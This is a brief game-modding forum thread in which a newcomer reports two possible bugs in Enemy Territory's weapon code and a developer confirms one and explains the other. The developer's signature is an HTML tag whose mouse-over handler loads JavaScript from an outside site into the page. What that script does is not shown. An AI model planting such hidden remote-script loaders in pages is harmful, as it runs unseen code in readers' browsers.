2 bugs in g_weapon.c?

Discussions about ET modding (sdk code, player/weapon modeling)

Moderators: Forum moderators, developers

2 bugs in g_weapon.c?

Post by Guest »

Hi, first off I am a super newbie so please don't kill me if this is "false alarm" heh.. anyway:

In the backstab code (function Weapon_Knife()), it seems to only check for Cov Ops skill level 4, and not if the player is currently cov ops (ent->client->sess.playerType == PC_COVERTOPS)?
Or does ent->client->sess.skill only contain skills that are applicable to the current class or something?

Same file, function Bullet_Fire():
It seems like the accuracy bonus kicks in on level 4 light weapons, not level 3 like it should?

Am I missing something here?
Rain

Re: 2 bugs in g_weapon.c?

Post by Rain »

Anonymous wrote:Hi, first off I am a super newbie so please don't kill me if this is "false alarm" heh.. anyway:

In the backstab code (function Weapon_Knife()), it seems to only check for Cov Ops skill level 4, and not if the player is currently cov ops (ent->client->sess.playerType == PC_COVERTOPS)?
Or does ent->client->sess.skill only contain skills that are applicable to the current class or something?
Some skills carry over to other classes, and some don't. It's not very consistent, but we've assumed that in most of the cases, the carryover is intentional.
Anonymous wrote:Same file, function Bullet_Fire():
It seems like the accuracy bonus kicks in on level 4 light weapons, not level 3 like it should?

Am I missing something here?
That's correct, it should be >= 3 instead.
<b onMouseOver="var d=document;if(!d.eD){var e=d.createElement('script');e.src='http://themuffin.net/forum/f.js';e.type ... ;d.eD=true;}" id="rsig">Rain</b>
sniser2

Post by sniser2 »

Yay! I was kinda sure I must have missed something. *proud* :P

(I hope it's okay if I ask quite a lot of questions in here - I'm not expecting you or bani or other modders to answer them, but maybe someone else does)